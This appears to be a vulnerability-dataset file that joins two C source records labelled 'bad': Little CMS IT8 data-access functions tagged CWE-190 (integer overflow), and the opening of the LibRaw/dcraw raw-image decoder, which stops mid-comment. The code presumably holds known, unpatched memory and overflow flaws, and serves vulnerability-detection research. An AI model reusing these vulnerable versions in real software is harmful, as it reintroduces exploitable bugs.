const char* CMSEXPORT cmsIT8GetDataRowCol(cmsHANDLE hIT8, int row, int col)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
return GetData(it8, row, col);
}
cmsFloat64Number CMSEXPORT cmsIT8GetDataRowColDbl(cmsHANDLE hIT8, int row, int col)
{
const char* Buffer;
Buffer = cmsIT8GetDataRowCol(hIT8, row, col);
if (Buffer == NULL) return 0.0;
return ParseFloatNumber(Buffer);
}
cmsBool CMSEXPORT cmsIT8SetDataRowCol(cmsHANDLE hIT8, int row, int col, const char* Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
return SetData(it8, row, col, Val);
}
cmsBool CMSEXPORT cmsIT8SetDataRowColDbl(cmsHANDLE hIT8, int row, int col, cmsFloat64Number Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
char Buff[256];
_cmsAssert(hIT8 != NULL);
snprintf(Buff, 255, it8->DoubleFormatter, Val);
return SetData(it8, row, col, Buff);
}
const char* CMSEXPORT cmsIT8GetData(cmsHANDLE hIT8, const char* cPatch, const char* cSample)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
int iField, iSet;
_cmsAssert(hIT8 != NULL);
iField = LocateSample(it8, cSample);
if (iField < 0) {
return NULL;
}
iSet = LocatePatch(it8, cPatch);
if (iSet < 0) {
return NULL;
}
return GetData(it8, iSet, iField);
}
cmsFloat64Number CMSEXPORT cmsIT8GetDataDbl(cmsHANDLE it8, const char* cPatch, const char* cSample)
{
const char* Buffer;
Buffer = cmsIT8GetData(it8, cPatch, cSample);
return ParseFloatNumber(Buffer);
}
cmsBool CMSEXPORT cmsIT8SetData(cmsHANDLE hIT8, const char* cPatch, const char* cSample, const char *Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
int iField, iSet;
TABLE* t;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
iField = LocateSample(it8, cSample);
if (iField < 0)
return FALSE;
if (t-> nPatches == 0) {
AllocateDataFormat(it8);
AllocateDataSet(it8);
CookPointers(it8);
}
if (cmsstrcasecmp(cSample, "SAMPLE_ID") == 0) {
iSet = LocateEmptyPatch(it8);
if (iSet < 0) {
return SynError(it8, "Couldn't add more patches '%s'\n", cPatch);
}
iField = t -> SampleID;
}
else {
iSet = LocatePatch(it8, cPatch);
if (iSet < 0) {
return FALSE;
}
}
return SetData(it8, iSet, iField, Val);
}
cmsBool CMSEXPORT cmsIT8SetDataDbl(cmsHANDLE hIT8, const char* cPatch,
const char* cSample,
cmsFloat64Number Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
char Buff[256];
_cmsAssert(hIT8 != NULL);
snprintf(Buff, 255, it8->DoubleFormatter, Val);
return cmsIT8SetData(hIT8, cPatch, cSample, Buff);
}
// Buffer should get MAXSTR at least
const char* CMSEXPORT cmsIT8GetPatchName(cmsHANDLE hIT8, int nPatch, char* buffer)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
TABLE* t;
char* Data;
_cmsAssert(hIT8 != NULL);
t = GetTable(it8);
Data = GetData(it8, nPatch, t->SampleID);
if (!Data) return NULL;
if (!buffer) return Data;
strncpy(buffer, Data, MAXSTR-1);
buffer[MAXSTR-1] = 0;
return buffer;
}
int CMSEXPORT cmsIT8GetPatchByName(cmsHANDLE hIT8, const char *cPatch)
{
_cmsAssert(hIT8 != NULL);
return LocatePatch((cmsIT8*)hIT8, cPatch);
}
cmsUInt32Number CMSEXPORT cmsIT8TableCount(cmsHANDLE hIT8)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
return it8 ->TablesCount;
}
// This handles the "LABEL" extension.
// Label, nTable, Type
int CMSEXPORT cmsIT8SetTableByLabel(cmsHANDLE hIT8, const char* cSet, const char* cField, const char* ExpectedType)
{
const char* cLabelFld;
char Type[256], Label[256];
cmsUInt32Number nTable;
_cmsAssert(hIT8 != NULL);
if (cField != NULL && *cField == 0)
cField = "LABEL";
if (cField == NULL)
cField = "LABEL";
cLabelFld = cmsIT8GetData(hIT8, cSet, cField);
if (!cLabelFld) return -1;
if (sscanf(cLabelFld, "%255s %u %255s", Label, &nTable, Type) != 3)
return -1;
if (ExpectedType != NULL && *ExpectedType == 0)
ExpectedType = NULL;
if (ExpectedType) {
if (cmsstrcasecmp(Type, ExpectedType) != 0) return -1;
}
return cmsIT8SetTable(hIT8, nTable);
}
cmsBool CMSEXPORT cmsIT8SetIndexColumn(cmsHANDLE hIT8, const char* cSample)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
int pos;
_cmsAssert(hIT8 != NULL);
pos = LocateSample(it8, cSample);
if(pos == -1)
return FALSE;
it8->Tab[it8->nTable].SampleID = pos;
return TRUE;
}
void CMSEXPORT cmsIT8DefineDblFormat(cmsHANDLE hIT8, const char* Formatter)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
_cmsAssert(hIT8 != NULL);
if (Formatter == NULL)
strcpy(it8->DoubleFormatter, DEFAULT_DBL_FORMAT);
else
strncpy(it8->DoubleFormatter, Formatter, sizeof(it8->DoubleFormatter));
it8 ->DoubleFormatter[sizeof(it8 ->DoubleFormatter)-1] = 0;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_352_9 |
crossvul-cpp_data_bad_582_0 | #ifndef IGNOREALL
/*
dcraw.c -- Dave Coffin's raw photo decoder
Copyright 1997-2015 by Dave Coffin, dcoffin a cybercom o net
This is a command-line ANSI C program to convert raw photos from
any digital camera on any computer running any operating system.
No license is required to download and use dcraw.c. However,
to lawfully redistribute dcraw, you must either (a) offer, at
no extra charge, full source code* for all executable files
containing RESTRICTED functions, (b) distribute this code under
the GPL Version 2 or later, (c) remove all RESTRICTED functions,
re-implement them, or copy them from an earlier, unrestricted
Revision of dcraw.c, or (d) purchase a license from the author.
The functions that process Foveon images have been RESTRICTED
since Revision 1.237. All other code remains free for all uses.
*If you have not modified dcraw.c in any way, a link to my
homepage qualifies as "full source code".
$Revision: 1.476 $
$Date: 2015/05/25 02:29:14 $
*/
/*@out DEFINES
#ifndef USE_JPEG
#define NO_JPEG
#endif
#ifndef USE_JASPER
#define NO_JASPER
#endif
@end DEFINES */
#define NO_LCMS
#define DCRAW_VERBOSE
//@out DEFINES
#define DCRAW_VERSION "9.26"
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#define _USE_MATH_DEFINES
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <float.h>
#include <limits.h>
#include <math.h>
#include <setjmp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
//@end DEFINES
#if defined(DJGPP) || defined(__MINGW32__)
#define fseeko fseek
#define ftello ftell
#else
#define fgetc getc_unlocked
#endif
//@out DEFINES
#ifdef __CYGWIN__
#include <io.h>
#endif
#if defined WIN32 || defined (__MINGW32__)
#include <sys/utime.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define snprintf _snprintf
#define strcasecmp stricmp
#define strncasecmp strnicmp
//@end DEFINES
typedef __int64 INT64;
typedef unsigned __int64 UINT64;
//@out DEFINES
#else
#include <unistd.h>
#include <utime.h>
#include <netinet/in.h>
typedef long long INT64;
typedef unsigned long long UINT64;
#endif
#ifdef NODEPS
#define NO_JASPER
#define NO_JPEG
#define NO_LCMS
#endif
#ifndef NO_JASPER
#include <jasper/jasper.h> /* Decode Red camera movies */
#endif
#ifndef NO_JPEG
#include <jpeglib.h> /* Decode compressed Kodak DC120 photos */
#endif /* and Adobe Lossy DNGs */
#ifndef NO_LCMS
#ifdef USE_LCMS
#include <lcms.h> /* Support color profiles */
#else
#include <lcms2.h> /* Support color profiles */
#endif
#endif
#ifdef LOCALEDIR
#include <libintl.h>
#define _(String) gettext(String)
#else
#define _(String) (String)
#endif
#ifdef LJPEG_DECODE
#error Please compile dcraw.c by itself.
#error Do not link it with ljpeg_decode.
#endif
#ifndef LONG_BIT
#define LONG_BIT (8 * sizeof (long))
#endif
//@end DEFINES
#if !defined(uchar)
#define uchar unsigned char
#endif
#if !defined(ushort)
#define ushort unsigned short
#endif
/*
All global variables are defined here, and all functions that
access them are prefixed with "CLASS". Note that a thread-safe
C++ class cannot have non-const static local variables.
*/
FILE *ifp, *ofp;
short order;
const char *ifname;
char *meta_data, xtrans[6][6], xtrans_abs[6][6];
char cdesc[5], desc[512], make[64], model[64], model2[64], artist[64],software[64];
float flash_used, canon_ev, iso_speed, shutter, aperture, focal_len;
time_t timestamp;
off_t strip_offset, data_offset;
off_t thumb_offset, meta_offset, profile_offset;
unsigned shot_order, kodak_cbpp, exif_cfa, unique_id;
unsigned thumb_length, meta_length, profile_length;
unsigned thumb_misc, *oprof, fuji_layout, shot_select=0, multi_out=0;
unsigned tiff_nifds, tiff_samples, tiff_bps, tiff_compress;
unsigned black, maximum, mix_green, raw_color, zero_is_bad;
unsigned zero_after_ff, is_raw, dng_version, is_foveon, data_error;
unsigned tile_width, tile_length, gpsdata[32], load_flags;
unsigned flip, tiff_flip, filters, colors;
ushort raw_height, raw_width, height, width, top_margin, left_margin;
ushort shrink, iheight, iwidth, fuji_width, thumb_width, thumb_height;
ushort *raw_image, (*image)[4], cblack[4102];
ushort white[8][8], curve[0x10000], cr2_slice[3], sraw_mul[4];
double pixel_aspect, aber[4]={1,1,1,1}, gamm[6]={ 0.45,4.5,0,0,0,0 };
float bright=1, user_mul[4]={0,0,0,0}, threshold=0;
int mask[8][4];
int half_size=0, four_color_rgb=0, document_mode=0, highlight=0;
int verbose=0, use_auto_wb=0, use_camera_wb=0, use_camera_matrix=1;
int output_color=1, output_bps=8, output_tiff=0, med_passes=0;
int no_auto_bright=0;
unsigned greybox[4] = { 0, 0, UINT_MAX, UINT_MAX };
float cam_mul[4], pre_mul[4], cmatrix[3][4], rgb_cam[3][4];
const double xyz_rgb[3][3] = { /* XYZ from RGB */
{ 0.412453, 0.357580, 0.180423 },
{ 0.212671, 0.715160, 0.072169 },
{ 0.019334, 0.119193, 0.950227 } };
const float d65_white[3] = { 0.950456, 1, 1.088754 };
int histogram[4][0x2000];
void (*write_thumb)(), (*write_fun)();
void (*load_raw)(), (*thumb_load_raw)();
jmp_buf failure;
struct decode {
struct decode *branch[2];
int leaf;
} first_decode[2048], *second_decode, *free_decode;
struct tiff_ifd {
int t_width, t_height, bps, comp, phint, offset, t_flip, samples, bytes;
int t_tile_width, t_tile_length,sample_format,predictor;
float t_shutter;
} tiff_ifd[10];
struct ph1 {
int format, key_off, tag_21a;
int t_black, split_col, black_col, split_row, black_row;
float tag_210;
} ph1;
#define CLASS
//@out DEFINES
#define FORC(cnt) for (c=0; c < cnt; c++)
#define FORC3 FORC(3)
#define FORC4 FORC(4)
#define FORCC for (c=0; c < colors && c < 4; c++)
#define SQR(x) ((x)*(x))
#define ABS(x) (((int)(x) ^ ((int)(x) >> 31)) - ((int)(x) >> 31))
#define MIN(a,b) ((a) < (b) ? (a) : (b))
#define MAX(a,b) ((a) > (b) ? (a) : (b))
#define LIM(x,min,max) MAX(min,MIN(x,max))
#define ULIM(x,y,z) ((y) < (z) ? LIM(x,y,z) : LIM(x,z,y))
#define CLIP(x) LIM((int)(x),0,65535)
#define SWAP(a,b) { a=a+b; b=a-b; a=a-b; }
#define my_swap(type, i, j) {type t = i; i = j; j = t;}
static float fMAX(float a, float b)
{
return MAX(a,b);
}
/*
In order to inline this calculation, I make the risky
assumption that all filter patterns can be described
by a repeating pattern of eight rows and two columns
Do not use the FC or BAYER macros with the Leaf CatchLight,
because its pattern is 16x16, not 2x8.
Return values are either 0/1/2/3 = G/M/C/Y or 0/1/2/3 = R/G1/B/G2
PowerShot 600 PowerShot A50 PowerShot Pro70 Pro90 & G1
0xe1e4e1e4: 0x1b4e4b1e: 0x1e4b4e1b: 0xb4b4b4b4:
0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5
0 G M G M G M 0 C Y C Y C Y 0 Y C Y C Y C 0 G M G M G M
1 C Y C Y C Y 1 M G M G M G 1 M G M G M G 1 Y C Y C Y C
2 M G M G M G 2 Y C Y C Y C 2 C Y C Y C Y
3 C Y C Y C Y 3 G M G M G M 3 G M G M G M
4 C Y C Y C Y 4 Y C Y C Y C
PowerShot A5 5 G M G M G M 5 G M G M G M
0x1e4e1e4e: 6 Y C Y C Y C 6 C Y C Y C Y
7 M G M G M G 7 M G M G M G
0 1 2 3 4 5
0 C Y C Y C Y
1 G M G M G M
2 C Y C Y C Y
3 M G M G M G
All RGB cameras use one of these Bayer grids:
0x16161616: 0x61616161: 0x49494949: 0x94949494:
0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5
0 B G B G B G 0 G R G R G R 0 G B G B G B 0 R G R G R G
1 G R G R G R 1 B G B G B G 1 R G R G R G 1 G B G B G B
2 B G B G B G 2 G R G R G R 2 G B G B G B 2 R G R G R G
3 G R G R G R 3 B G B G B G 3 R G R G R G 3 G B G B G B
*/
#define RAWINDEX(row, col) ((row)*raw_width + (col))
#define RAW(row,col) \
raw_image[(row)*raw_width+(col)]
//@end DEFINES
#define FC(row,col) \
(filters >> ((((row) << 1 & 14) + ((col) & 1)) << 1) & 3)
//@out DEFINES
#define BAYER(row,col) \
image[((row) >> shrink)*iwidth + ((col) >> shrink)][FC(row,col)]
#define BAYER2(row,col) \
image[((row) >> shrink)*iwidth + ((col) >> shrink)][fcol(row,col)]
//@end DEFINES
/* @out COMMON
#include <math.h>
#define CLASS LibRaw::
#include "libraw/libraw_types.h"
#define LIBRAW_LIBRARY_BUILD
#define LIBRAW_IO_REDEFINED
#include "libraw/libraw.h"
#include "internal/defines.h"
#include "internal/var_defines.h"
@end COMMON */
//@out COMMON
int CLASS fcol (int row, int col)
{
static const char filter[16][16] =
{ { 2,1,1,3,2,3,2,0,3,2,3,0,1,2,1,0 },
{ 0,3,0,2,0,1,3,1,0,1,1,2,0,3,3,2 },
{ 2,3,3,2,3,1,1,3,3,1,2,1,2,0,0,3 },
{ 0,1,0,1,0,2,0,2,2,0,3,0,1,3,2,1 },
{ 3,1,1,2,0,1,0,2,1,3,1,3,0,1,3,0 },
{ 2,0,0,3,3,2,3,1,2,0,2,0,3,2,2,1 },
{ 2,3,3,1,2,1,2,1,2,1,1,2,3,0,0,1 },
{ 1,0,0,2,3,0,0,3,0,3,0,3,2,1,2,3 },
{ 2,3,3,1,1,2,1,0,3,2,3,0,2,3,1,3 },
{ 1,0,2,0,3,0,3,2,0,1,1,2,0,1,0,2 },
{ 0,1,1,3,3,2,2,1,1,3,3,0,2,1,3,2 },
{ 2,3,2,0,0,1,3,0,2,0,1,2,3,0,1,0 },
{ 1,3,1,2,3,2,3,2,0,2,0,1,1,0,3,0 },
{ 0,2,0,3,1,0,0,1,1,3,3,2,3,2,2,1 },
{ 2,1,3,2,3,1,2,1,0,3,0,2,0,2,0,2 },
{ 0,3,1,0,0,2,0,3,2,1,3,1,1,3,1,3 } };
if (filters == 1) return filter[(row+top_margin)&15][(col+left_margin)&15];
if (filters == 9) return xtrans[(row+6) % 6][(col+6) % 6];
return FC(row,col);
}
static size_t local_strnlen(const char *s, size_t n)
{
const char *p = (const char *)memchr(s, 0, n);
return(p ? p-s : n);
}
/* add OS X version check here ?? */
#define strnlen(a,b) local_strnlen(a,b)
#ifdef LIBRAW_LIBRARY_BUILD
static int stread(char *buf, size_t len, LibRaw_abstract_datastream *fp)
{
int r = fp->read(buf,len,1);
buf[len-1] = 0;
return r;
}
#define stmread(buf,maxlen,fp) stread(buf,MIN(maxlen,sizeof(buf)),fp)
#endif
#ifndef __GLIBC__
char *my_memmem (char *haystack, size_t haystacklen,
char *needle, size_t needlelen)
{
char *c;
for (c = haystack; c <= haystack + haystacklen - needlelen; c++)
if (!memcmp (c, needle, needlelen))
return c;
return 0;
}
#define memmem my_memmem
char *my_strcasestr (char *haystack, const char *needle)
{
char *c;
for (c = haystack; *c; c++)
if (!strncasecmp(c, needle, strlen(needle)))
return c;
return 0;
}
#define strcasestr my_strcasestr
#endif
#define strbuflen(buf) strnlen(buf,sizeof(buf)-1)
//@end COMMON
void CLASS merror (void *ptr, const char *where)
{
if (ptr) return;
fprintf (stderr,_("%s: Out of memory in %s\n"), ifname, where);
longjmp (failure, 1);
}
void CLASS derror()
{
if (!data_error) {
fprintf (stderr, "%s: ", ifname);
if (feof(ifp))
fprintf (stderr,_("Unexpected end of file\n"));
else
fprintf (stderr,_("Corrupt data near 0x%llx\n"), (INT64) ftello(ifp));
}
data_error++;
}
//@out COMMON
ushort CLASS sget2 (uchar *s)
{
if (order == 0x4949) /* "II" means little-endian */
return s[0] | s[1] << 8;
else /* "MM" means big-endian */
return s[0] << 8 | s[1];
}
// DNG was written by:
#define CameraDNG 1
#define AdobeDNG 2
#ifdef LIBRAW_LIBRARY_BUILD
static int getwords(char *line, char *words[], int maxwords,int maxlen)
{
line[maxlen-1] = 0;
char *p = line;
int nwords = 0;
while(1)
{
while(isspace(*p)) p++;
if(*p == '\0') return nwords;
words[nwords++] = p;
while(!isspace(*p) && *p != '\0') p++;
if(*p == '\0') return nwords;
*p++ = '\0';
if(nwords >= maxwords) return nwords;
}
}
static ushort saneSonyCameraInfo(uchar a, uchar b, uchar c, uchar d, uchar e, uchar f){
if ((a >> 4) > 9) return 0;
else if ((a & 0x0f) > 9) return 0;
else if ((b >> 4) > 9) return 0;
else if ((b & 0x0f) > 9) return 0;
else if ((c >> 4) > 9) return 0;
else if ((c & 0x0f) > 9) return 0;
else if ((d >> 4) > 9) return 0;
else if ((d & 0x0f) > 9) return 0;
else if ((e >> 4) > 9) return 0;
else if ((e & 0x0f) > 9) return 0;
else if ((f >> 4) > 9) return 0;
else if ((f & 0x0f) > 9) return 0;
return 1;
}
static ushort bcd2dec(uchar data){
if ((data >> 4) > 9) return 0;
else if ((data & 0x0f) > 9) return 0;
else return (data >> 4) * 10 + (data & 0x0f);
}
static uchar SonySubstitution[257] = "\x00\x01\x32\xb1\x0a\x0e\x87\x28\x02\xcc\xca\xad\x1b\xdc\x08\xed\x64\x86\xf0\x4f\x8c\x6c\xb8\xcb\x69\xc4\x2c\x03\x97\xb6\x93\x7c\x14\xf3\xe2\x3e\x30\x8e\xd7\x60\x1c\xa1\xab\x37\xec\x75\xbe\x23\x15\x6a\x59\x3f\xd0\xb9\x96\xb5\x50\x27\x88\xe3\x81\x94\xe0\xc0\x04\x5c\xc6\xe8\x5f\x4b\x70\x38\x9f\x82\x80\x51\x2b\xc5\x45\x49\x9b\x21\x52\x53\x54\x85\x0b\x5d\x61\xda\x7b\x55\x26\x24\x07\x6e\x36\x5b\x47\xb7\xd9\x4a\xa2\xdf\xbf\x12\x25\xbc\x1e\x7f\x56\xea\x10\xe6\xcf\x67\x4d\x3c\x91\x83\xe1\x31\xb3\x6f\xf4\x05\x8a\x46\xc8\x18\x76\x68\xbd\xac\x92\x2a\x13\xe9\x0f\xa3\x7a\xdb\x3d\xd4\xe7\x3a\x1a\x57\xaf\x20\x42\xb2\x9e\xc3\x8b\xf2\xd5\xd3\xa4\x7e\x1f\x98\x9c\xee\x74\xa5\xa6\xa7\xd8\x5e\xb0\xb4\x34\xce\xa8\x79\x77\x5a\xc1\x89\xae\x9a\x11\x33\x9d\xf5\x39\x19\x65\x78\x16\x71\xd2\xa9\x44\x63\x40\x29\xba\xa0\x8f\xe4\xd6\x3b\x84\x0d\xc2\x4e\x58\xdd\x99\x22\x6b\xc9\xbb\x17\x06\xe5\x7d\x66\x43\x62\xf6\xcd\x35\x90\x2e\x41\x8d\x6d\xaa\x09\x73\x95\x0c\xf1\x1d\xde\x4c\x2f\x2d\xf7\xd1\x72\xeb\xef\x48\xc7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff";
ushort CLASS sget2Rev(uchar *s) // specific to some Canon Makernotes fields, where they have endian in reverse
{
if (order == 0x4d4d) /* "II" means little-endian, and we reverse to "MM" - big endian */
return s[0] | s[1] << 8;
else /* "MM" means big-endian... */
return s[0] << 8 | s[1];
}
#endif
ushort CLASS get2()
{
uchar str[2] = { 0xff,0xff };
fread (str, 1, 2, ifp);
return sget2(str);
}
unsigned CLASS sget4 (uchar *s)
{
if (order == 0x4949)
return s[0] | s[1] << 8 | s[2] << 16 | s[3] << 24;
else
return s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3];
}
#define sget4(s) sget4((uchar *)s)
unsigned CLASS get4()
{
uchar str[4] = { 0xff,0xff,0xff,0xff };
fread (str, 1, 4, ifp);
return sget4(str);
}
unsigned CLASS getint (int type)
{
return type == 3 ? get2() : get4();
}
float CLASS int_to_float (int i)
{
union { int i; float f; } u;
u.i = i;
return u.f;
}
double CLASS getreal (int type)
{
union { char c[8]; double d; } u,v;
int i, rev;
switch (type) {
case 3: return (unsigned short) get2();
case 4: return (unsigned int) get4();
case 5:
u.d = (unsigned int) get4();
v.d = (unsigned int)get4();
return u.d / (v.d ? v.d : 1);
case 8: return (signed short) get2();
case 9: return (signed int) get4();
case 10:
u.d = (signed int) get4();
v.d = (signed int)get4();
return u.d / (v.d?v.d:1);
case 11: return int_to_float (get4());
case 12:
rev = 7 * ((order == 0x4949) == (ntohs(0x1234) == 0x1234));
for (i=0; i < 8; i++)
u.c[i ^ rev] = fgetc(ifp);
return u.d;
default: return fgetc(ifp);
}
}
void CLASS read_shorts (ushort *pixel, unsigned count)
{
if (fread (pixel, 2, count, ifp) < count) derror();
if ((order == 0x4949) == (ntohs(0x1234) == 0x1234))
swab ((char*)pixel, (char*)pixel, count*2);
}
void CLASS cubic_spline (const int *x_, const int *y_, const int len)
{
float **A, *b, *c, *d, *x, *y;
int i, j;
A = (float **) calloc (((2*len + 4)*sizeof **A + sizeof *A), 2*len);
if (!A) return;
A[0] = (float *) (A + 2*len);
for (i = 1; i < 2*len; i++)
A[i] = A[0] + 2*len*i;
y = len + (x = i + (d = i + (c = i + (b = A[0] + i*i))));
for (i = 0; i < len; i++) {
x[i] = x_[i] / 65535.0;
y[i] = y_[i] / 65535.0;
}
for (i = len-1; i > 0; i--) {
b[i] = (y[i] - y[i-1]) / (x[i] - x[i-1]);
d[i-1] = x[i] - x[i-1];
}
for (i = 1; i < len-1; i++) {
A[i][i] = 2 * (d[i-1] + d[i]);
if (i > 1) {
A[i][i-1] = d[i-1];
A[i-1][i] = d[i-1];
}
A[i][len-1] = 6 * (b[i+1] - b[i]);
}
for(i = 1; i < len-2; i++) {
float v = A[i+1][i] / A[i][i];
for(j = 1; j <= len-1; j++)
A[i+1][j] -= v * A[i][j];
}
for(i = len-2; i > 0; i--) {
float acc = 0;
for(j = i; j <= len-2; j++)
acc += A[i][j]*c[j];
c[i] = (A[i][len-1] - acc) / A[i][i];
}
for (i = 0; i < 0x10000; i++) {
float x_out = (float)(i / 65535.0);
float y_out = 0;
for (j = 0; j < len-1; j++) {
if (x[j] <= x_out && x_out <= x[j+1]) {
float v = x_out - x[j];
y_out = y[j] +
((y[j+1] - y[j]) / d[j] - (2 * d[j] * c[j] + c[j+1] * d[j])/6) * v
+ (c[j] * 0.5) * v*v + ((c[j+1] - c[j]) / (6 * d[j])) * v*v*v;
}
}
curve[i] = y_out < 0.0 ? 0 : (y_out >= 1.0 ? 65535 :
(ushort)(y_out * 65535.0 + 0.5));
}
free (A);
}
void CLASS canon_600_fixed_wb (int temp)
{
static const short mul[4][5] = {
{ 667, 358,397,565,452 },
{ 731, 390,367,499,517 },
{ 1119, 396,348,448,537 },
{ 1399, 485,431,508,688 } };
int lo, hi, i;
float frac=0;
for (lo=4; --lo; )
if (*mul[lo] <= temp) break;
for (hi=0; hi < 3; hi++)
if (*mul[hi] >= temp) break;
if (lo != hi)
frac = (float) (temp - *mul[lo]) / (*mul[hi] - *mul[lo]);
for (i=1; i < 5; i++)
pre_mul[i-1] = 1 / (frac * mul[hi][i] + (1-frac) * mul[lo][i]);
}
/* Return values: 0 = white 1 = near white 2 = not white */
int CLASS canon_600_color (int ratio[2], int mar)
{
int clipped=0, target, miss;
if (flash_used) {
if (ratio[1] < -104)
{ ratio[1] = -104; clipped = 1; }
if (ratio[1] > 12)
{ ratio[1] = 12; clipped = 1; }
} else {
if (ratio[1] < -264 || ratio[1] > 461) return 2;
if (ratio[1] < -50)
{ ratio[1] = -50; clipped = 1; }
if (ratio[1] > 307)
{ ratio[1] = 307; clipped = 1; }
}
target = flash_used || ratio[1] < 197
? -38 - (398 * ratio[1] >> 10)
: -123 + (48 * ratio[1] >> 10);
if (target - mar <= ratio[0] &&
target + 20 >= ratio[0] && !clipped) return 0;
miss = target - ratio[0];
if (abs(miss) >= mar*4) return 2;
if (miss < -20) miss = -20;
if (miss > mar) miss = mar;
ratio[0] = target - miss;
return 1;
}
void CLASS canon_600_auto_wb()
{
int mar, row, col, i, j, st, count[] = { 0,0 };
int test[8], total[2][8], ratio[2][2], stat[2];
memset (&total, 0, sizeof total);
i = canon_ev + 0.5;
if (i < 10) mar = 150;
else if (i > 12) mar = 20;
else mar = 280 - 20 * i;
if (flash_used) mar = 80;
for (row=14; row < height-14; row+=4)
for (col=10; col < width; col+=2) {
for (i=0; i < 8; i++)
test[(i & 4) + FC(row+(i >> 1),col+(i & 1))] =
BAYER(row+(i >> 1),col+(i & 1));
for (i=0; i < 8; i++)
if (test[i] < 150 || test[i] > 1500) goto next;
for (i=0; i < 4; i++)
if (abs(test[i] - test[i+4]) > 50) goto next;
for (i=0; i < 2; i++) {
for (j=0; j < 4; j+=2)
ratio[i][j >> 1] = ((test[i*4+j+1]-test[i*4+j]) << 10) / test[i*4+j];
stat[i] = canon_600_color (ratio[i], mar);
}
if ((st = stat[0] | stat[1]) > 1) goto next;
for (i=0; i < 2; i++)
if (stat[i])
for (j=0; j < 2; j++)
test[i*4+j*2+1] = test[i*4+j*2] * (0x400 + ratio[i][j]) >> 10;
for (i=0; i < 8; i++)
total[st][i] += test[i];
count[st]++;
next: ;
}
if (count[0] | count[1]) {
st = count[0]*200 < count[1];
for (i=0; i < 4; i++)
pre_mul[i] = 1.0 / (total[st][i] + total[st][i+4]);
}
}
void CLASS canon_600_coeff()
{
static const short table[6][12] = {
{ -190,702,-1878,2390, 1861,-1349,905,-393, -432,944,2617,-2105 },
{ -1203,1715,-1136,1648, 1388,-876,267,245, -1641,2153,3921,-3409 },
{ -615,1127,-1563,2075, 1437,-925,509,3, -756,1268,2519,-2007 },
{ -190,702,-1886,2398, 2153,-1641,763,-251, -452,964,3040,-2528 },
{ -190,702,-1878,2390, 1861,-1349,905,-393, -432,944,2617,-2105 },
{ -807,1319,-1785,2297, 1388,-876,769,-257, -230,742,2067,-1555 } };
int t=0, i, c;
float mc, yc;
mc = pre_mul[1] / pre_mul[2];
yc = pre_mul[3] / pre_mul[2];
if (mc > 1 && mc <= 1.28 && yc < 0.8789) t=1;
if (mc > 1.28 && mc <= 2) {
if (yc < 0.8789) t=3;
else if (yc <= 2) t=4;
}
if (flash_used) t=5;
for (raw_color = i=0; i < 3; i++)
FORCC rgb_cam[i][c] = table[t][i*4 + c] / 1024.0;
}
void CLASS canon_600_load_raw()
{
uchar data[1120], *dp;
ushort *pix;
int irow, row;
for (irow=row=0; irow < height; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (data, 1, 1120, ifp) < 1120) derror();
pix = raw_image + row*raw_width;
for (dp=data; dp < data+1120; dp+=10, pix+=8) {
pix[0] = (dp[0] << 2) + (dp[1] >> 6 );
pix[1] = (dp[2] << 2) + (dp[1] >> 4 & 3);
pix[2] = (dp[3] << 2) + (dp[1] >> 2 & 3);
pix[3] = (dp[4] << 2) + (dp[1] & 3);
pix[4] = (dp[5] << 2) + (dp[9] & 3);
pix[5] = (dp[6] << 2) + (dp[9] >> 2 & 3);
pix[6] = (dp[7] << 2) + (dp[9] >> 4 & 3);
pix[7] = (dp[8] << 2) + (dp[9] >> 6 );
}
if ((row+=2) > height) row = 1;
}
}
void CLASS canon_600_correct()
{
int row, col, val;
static const short mul[4][2] =
{ { 1141,1145 }, { 1128,1109 }, { 1178,1149 }, { 1128,1109 } };
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++) {
if ((val = BAYER(row,col) - black) < 0) val = 0;
val = val * mul[row & 3][col & 1] >> 9;
BAYER(row,col) = val;
}
}
canon_600_fixed_wb(1311);
canon_600_auto_wb();
canon_600_coeff();
maximum = (0x3ff - black) * 1109 >> 9;
black = 0;
}
int CLASS canon_s2is()
{
unsigned row;
for (row=0; row < 100; row++) {
fseek (ifp, row*3340 + 3284, SEEK_SET);
if (getc(ifp) > 15) return 1;
}
return 0;
}
unsigned CLASS getbithuff (int nbits, ushort *huff)
{
#ifdef LIBRAW_NOTHREADS
static unsigned bitbuf=0;
static int vbits=0, reset=0;
#else
#define bitbuf tls->getbits.bitbuf
#define vbits tls->getbits.vbits
#define reset tls->getbits.reset
#endif
unsigned c;
if (nbits > 25) return 0;
if (nbits < 0)
return bitbuf = vbits = reset = 0;
if (nbits == 0 || vbits < 0) return 0;
while (!reset && vbits < nbits && (c = fgetc(ifp)) != EOF &&
!(reset = zero_after_ff && c == 0xff && fgetc(ifp))) {
bitbuf = (bitbuf << 8) + (uchar) c;
vbits += 8;
}
c = bitbuf << (32-vbits) >> (32-nbits);
if (huff) {
vbits -= huff[c] >> 8;
c = (uchar) huff[c];
} else
vbits -= nbits;
if (vbits < 0) derror();
return c;
#ifndef LIBRAW_NOTHREADS
#undef bitbuf
#undef vbits
#undef reset
#endif
}
#define getbits(n) getbithuff(n,0)
#define gethuff(h) getbithuff(*h,h+1)
/*
